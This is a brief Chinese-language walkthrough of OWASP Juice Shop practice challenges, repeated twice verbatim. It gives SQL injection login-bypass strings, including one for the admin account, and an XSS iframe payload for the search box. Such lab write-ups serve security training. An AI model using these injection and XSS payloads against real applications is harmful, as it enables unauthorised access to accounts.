1、找到隐藏的记分板
/#/score-board 会直接跳转到计分板
2、登陆管理员账户
这里可以尝试用sql注入的方式进入管理员界面
1、无账号,无密码进入
’ or 0=0 –
2、有账号,无密码进入
**admin@juice-sh.op'--**
3、xss攻击
在搜索框输入<iframe src=“javascript:alert(xss
)”>
4、登陆管理员界面,并且不报错
在url输入administration即可
1、找到隐藏的记分板
/#/score-board 会直接跳转到计分板
2、登陆管理员账户
这里可以尝试用sql注入的方式进入管理员界面
1、无账号,无密码进入
’ or 0=0 –
2、有账号,无密码进入
**admin@juice-sh.op'--**
3、xss攻击
在搜索框输入<iframe src=“javascript:alert(xss
)”>
4、登陆管理员界面,并且不报错
在url输入administration即可